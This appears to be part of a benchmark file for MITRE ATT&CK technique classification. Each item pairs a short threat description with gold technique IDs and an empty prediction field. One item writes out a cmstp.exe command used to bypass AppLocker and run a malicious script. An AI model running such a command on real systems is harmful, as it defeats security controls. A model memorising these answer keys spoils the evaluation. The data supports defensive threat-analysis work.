+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used TCP port 8080 for C2.",
+ "gold": [
+ "T1043"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used the command cmstp.exe /s /ns C:\\Users\\ADMINI~W\\AppData\\Local\\Temp\\XKNqbpzl.txt to bypass AppLocker and launch a malicious script.",
+ "gold": [
+ "T1218.003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used the publicly available tool SoftPerfect Network Scanner as well as a custom tool called GOLDIRONY to conduct network scanning.",
+ "gold": [
+ "T1046"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used to gather the OS version, as well as information on the system configuration, BIOS, the motherboard, and the processor.",
+ "gold": [
+ "T1082"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used to get information on processes.",
+ "gold": [
+ "T1057"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used tools to exploit Windows vulnerabilities in order to escalate privileges. The tools targeted CVE-2013-3660, CVE-2011-2005, and CVE-2010-4398, all of which could allow local users to access kernel-level privileges.",
+ "gold": [
+ "T1068"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used tools to perform keylogging.",
+ "gold": [
+ "T1056"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used to use DLL side-loading to evade anti-virus and to maintain persistence on a victim.",
+ "gold": [
+ "T1574.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used valid accounts for privilege escalation.",
+ "gold": [
+ "T1078"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used watering holes to deliver files with exploits to initial victims.",
+ "gold": [
+ "T1189"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "has used WMI for execution.",
+ "gold": [
+ "T1047"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "hooks processes by modifying IAT pointers to CreateWindowEx.",
+ "gold": [
+ "T1056.004"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "identified and extracted all Word documents on a server by using a command containing * .doc and *.docx. The actors also searched for documents based on a specific date range and attempted to identify all installed software on a victim.",
+ "gold": [
+ "T1083"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "identifies files with certain extensions from USB devices, then copies them to a predefined directory.",
+ "gold": [
+ "T1083"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "If running in a Windows environment, saves a DLL to disk that is injected into the explorer.exe process to execute the payload. can also be configured to inject and execute within specific processes.",
+ "gold": [
+ "T1055"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "If the victim is using PowerShell 3.0 or later, writes its decoded payload to an alternate data stream (ADS) named kernel32.dll that is saved in %PROGRAMDATA%\\Windows\\.",
+ "gold": [
+ "T1564.004"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "injects itself into the secure shell (SSH) process.",
+ "gold": [
+ "T1055"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "\"In one instance, added as a service with a display name of \"\"Corel Writing Tools Utility.\"\"\"",
+ "gold": [
+ "T1036"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "installer/uninstaller component deletes itself if it encounters a version of Windows earlier than Windows XP or identifies security-related processes running.",
+ "gold": [
+ "T1070.004"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "installer uses WMI to search for antivirus display names.",
+ "gold": [
+ "T1047"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "installs a service on the remote system, executes the command, then uninstalls the service.",
+ "gold": [
+ "T1569.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "installs itself as a service for persistence.",
+ "gold": [
+ "T1543.003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "installs itself as a service to maintain persistence.",
+ "gold": [
+ "T1543.003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "\"installs itself in %ALLUSERPROFILE%\\\\Application Data\\Microsoft\\MediaPlayer\\updatewindws.exe; the directory name is missing a space and the file name is missing the letter \"\"o.\"\"\"",
+ "gold": [
+ "T1036"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "installs VNC server software that executes through rundll32.",
+ "gold": [
+ "T1218.011"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "is a Web shell that appears to be exclusively used by . It is installed as an ISAPI filter on Exchange servers and shares characteristics with the Web shell.",
+ "gold": [
+ "T1505.003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "is capable of capturing keystrokes on victims.",
+ "gold": [
+ "T1056"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "is capable of capturing screenshots.",
+ "gold": [
+ "T1113"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "is capable of capturing video.",
+ "gold": [
+ "T1125"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "is capable of downloading a file from a specified URL.",
+ "gold": [
+ "T1105"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "is capable of enumerating Registry keys and values.",
+ "gold": [
+ "T1012"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "is capable of gathering system information.",
+ "gold": [
+ "T1082"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "is capable of leveraging cloud storage APIs such as Cloud, Box, Dropbox, and Yandex for C2.",
+ "gold": [
+ "T1102"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "is capable of modifying the Registry.",
+ "gold": [
+ "T1112"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "is capable of providing Meterpreter shell access.",
+ "gold": [
+ "T1059"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "is capable of spawning a reverse shell on a victim.",
+ "gold": [
+ "T1059"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "is known to use PowerShell.",
+ "gold": [
+ "T1059.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "is loaded and executed by a highly obfuscated launcher.",
+ "gold": [
+ "T1027"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "is used for proxying connections to obfuscate command and control infrastructure.",
+ "gold": [
+ "T1090"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "It is believed that a patch management system for an anti-virus product commonly installed among targeted companies was used to distribute the malware.",
+ "gold": [
+ "T1072"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "kills antimalware running process.",
+ "gold": [
+ "T1562.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "launched an HTTP malware variant and a Port 22 malware variant using a legitimate executable that loaded the malicious DLL.",
+ "gold": [
+ "T1574.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "launches a DLL file that gets executed as a service using svchost.exe",
+ "gold": [
+ "T1569.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "leverages a known zero-day vulnerability in Adobe Flash to execute the implant into the victims\u2019 machines.",
+ "gold": [
+ "T1203"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "leverages the Windows API calls: VirtualAlloc(), WriteProcessMemory(), and CreateRemoteThread() for process injection.",
+ "gold": [
+ "T1106"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "lists local users and session information.",
+ "gold": [
+ "T1033"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "lists the current processes running.",
+ "gold": [
+ "T1057"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "lists the running processes on the system.",
+ "gold": [
+ "T1057"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "looked for a specific process running on infected servers.",
+ "gold": [
+ "T1057"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "malware can download a remote access tool, NanoCore, and inject into another process.",
+ "gold": [
+ "T1055"
+ ],
+ "predicted": ""
+ },
+ {
